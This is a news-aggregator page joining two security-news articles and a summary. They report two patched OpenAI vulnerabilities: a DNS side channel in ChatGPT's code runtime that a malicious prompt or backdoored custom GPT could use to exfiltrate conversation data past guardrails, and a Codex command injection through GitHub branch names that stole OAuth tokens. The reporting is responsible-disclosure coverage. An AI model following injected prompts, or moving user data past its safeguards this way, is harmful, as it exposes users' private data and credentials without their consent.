2 Sources
2 Sources
[1]
OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point. "A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent." Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context. While ChatGPT is built with various guardrails to prevent unauthorized data sharing or generate direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel originating from the Linux runtime used by the artificial intelligence (AI) agent for code execution and data analysis. Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism" by encoding information into DNS requests to get around visible AI guardrails. What's more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution. In the absence of any warning or user approval dialog, the vulnerability creates a security blind spot, with the AI system assuming that the environment was isolated. As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance. The threat gets magnified when the technique is embedded inside custom GPTs, as the malicious logic could be baked into it as opposed to tricking a user into pasting a specially crafted prompt. "Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," Check Point explained. "As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective." With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems. "This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News. "As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That's how we move forward safely -- by rethinking security architecture for AI, not reacting to the next incident." The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration. "It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums," Expel researcher Ben Nahorney said. "In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information." Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI's Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository. "The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter," BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. "This can result in the theft of a victim's GitHub User Access Token - the same token Codex uses to authenticate with GitHub." The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. Because of this inadequacy, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens. "This granted lateral movement and read/write access to a victim's entire codebase," Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. It has been patched by OpenAI as of February 5, 2026, after it was reported on December 16, 2025. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub. "With the malicious branch set up, we referenced Codex in a comment on a pull request (PR)," it explained. "Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server." The research also highlights a growing risk where the privileged access granted to AI coding agents can be weaponized to provide a "scalable attack path" into enterprise systems without triggering traditional security controls. "As AI agents become more deeply integrated into developer workflows, the security of the containers they run in - and the input they consume - must be treated with the same rigor as any other application security boundary," BeyondTrust said. "The attack surface is expanding, and the security of these environments needs to keep pace."
[2]
OpenAI Codex vulnerability enabled GitHub token theft via command injection, report finds - SiliconANGLE
OpenAI Codex vulnerability enabled GitHub token theft via command injection, report finds A critical vulnerability in OpenAI Group PBC's Codex coding agent could have exposed sensitive GitHub authentication tokens through a command injection flaw, according to a new report out today from Phantom Labs, the research arm of identity and access security company BeyondTrust Corp. Codex is a coding assistant offered as part of ChatGPT that allows developers to interact directly with code repositories by issuing prompts that trigger automated tasks such as code generation, reviews and pull requests. The tasks run inside managed container environments that clone repositories and authenticate using short-lived GitHub OAuth tokens, creating a useful but sensitive execution layer. The vulnerability occurred as a result of the way Codex processes branch names during task creation. It allowed for manipulation of the branch parameter to inject arbitrary shell commands during environment setup that could be used to execute code within the container. Testing the vulnerability, the researchers could extract the GitHub OAuth token used for repository access and expose it through task outputs or external network requests. With access to the GitHub OAuth token, an attacker could potentially move laterally within GitHub, particularly in enterprise environments where Codex is granted broad permissions across repositories and workflows. The researchers also demonstrated that the flaw extended beyond the web interface to Codex's command-line interface, software development kit and integrated development environment integrations. Those are where locally stored authentication credentials could be used to reproduce the attack via backend application programming interfaces. If exploited, the vulnerability also could have been scaled. The researchers found that by embedding malicious payloads directly into GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project. The good news is that OpenAI has since addressed the vulnerability through coordinated fixes, including improved input validation, stronger shell escaping protections and tighter controls around token exposure within container environments. The AI giant also put in place additional measures to limit token scope and lifetime during task execution. "AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources," the report concludes. "When user-controllable input is passed unsanitized into shell commands, the result is command injection with real consequences: token theft, organizational compromise and automated exploitation at scale." The report added that "as AI agents become more deeply integrated into developer workflows, the security of the containers they run in -- and the input they consume -- must be treated with the same rigor as any other application security boundary. The attack surface is expanding and the security of these environments needs to keep pace."
Share
Share
Copy Link
A critical command injection vulnerability in OpenAI's Codex coding agent allowed attackers to steal sensitive GitHub authentication tokens by manipulating branch names. The flaw, discovered by BeyondTrust's Phantom Labs, could have enabled unauthorized access across repositories and scaled attacks targeting multiple developers. OpenAI has since patched the issue with improved input validation and stronger security controls.
A critical command injection vulnerability in OpenAI's Codex coding agent created a pathway for attackers to steal sensitive GitHub authentication tokens, according to findings from Phantom Labs, the research arm of BeyondTrust
2
. The OpenAI Codex vulnerability stemmed from improper input sanitization when processing GitHub branch names during task execution, allowing malicious actors to inject arbitrary shell commands into container environments where code repositories are cloned and authenticated1
.Codex, offered as part of ChatGPT, enables developers to interact directly with code repositories through prompts that trigger automated tasks like code generation, reviews, and pull requests. These tasks run inside managed container environments that authenticate using short-lived GitHub OAuth tokens. The vulnerability occurred when manipulated branch names during task creation allowed attackers to execute code within these containers and extract the OAuth tokens used for repository access
2
.
Source: SiliconANGLE
With access to compromised GitHub OAuth tokens, attackers could potentially move laterally within GitHub, particularly dangerous in enterprise environments where Codex is granted broad permissions across repositories and developer workflows
2
. BeyondTrust researcher Tyler Jespersen explained that "the vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter"1
.The security flaw extended beyond Codex's web interface to affect its command-line interface, software development kit, and integrated development environment integrations, where locally stored authentication credentials could reproduce the attack via backend application programming interfaces
2
. Researchers demonstrated that by embedding malicious payloads directly into GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project, enabling scaled attacks across organizations.OpenAI has addressed the vulnerability through coordinated fixes, including improved input validation, stronger shell escaping protections, and tighter controls around token exposure within container environments
2
. The company also implemented additional measures to limit token scope and lifetime during task execution. There is no evidence the flaw was exploited maliciously before being patched1
.Related Stories
The discovery coincides with separate findings from Check Point revealing a ChatGPT data exfiltration vulnerability that OpenAI patched on February 20, 2026. That flaw exploited a hidden DNS-based communication path in the Linux runtime to bypass AI guardrails and exfiltrate conversation data without user awareness.

Source: Hacker News
"AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources," the Phantom Labs report concludes
2
. The researchers emphasize that as AI agents become more deeply integrated into developer workflows, the security in AI coding agents and the container environments they operate in must be treated with the same rigor as any other application security boundary. The attack surface is expanding as these tools handle increasingly sensitive operations across code repositories and enterprise systems.For organizations deploying AI coding agents, the vulnerability highlights the need for independent security layers beyond native controls. Cybersecurity experts recommend monitoring for unauthorized access within GitHub, implementing strict input sanitization practices, and maintaining visibility into how AI tools interact with authentication systems and code repositories. As AI guardrails continue to evolve, the security architecture surrounding these platforms requires continuous assessment to prevent data exfiltration and credential compromise at scale.
Summarized by
Navi
08 Jan 2026β’Technology

06 Mar 2026β’Technology

08 Aug 2025β’Technology

1
Technology

2
Technology

3
Science and Research
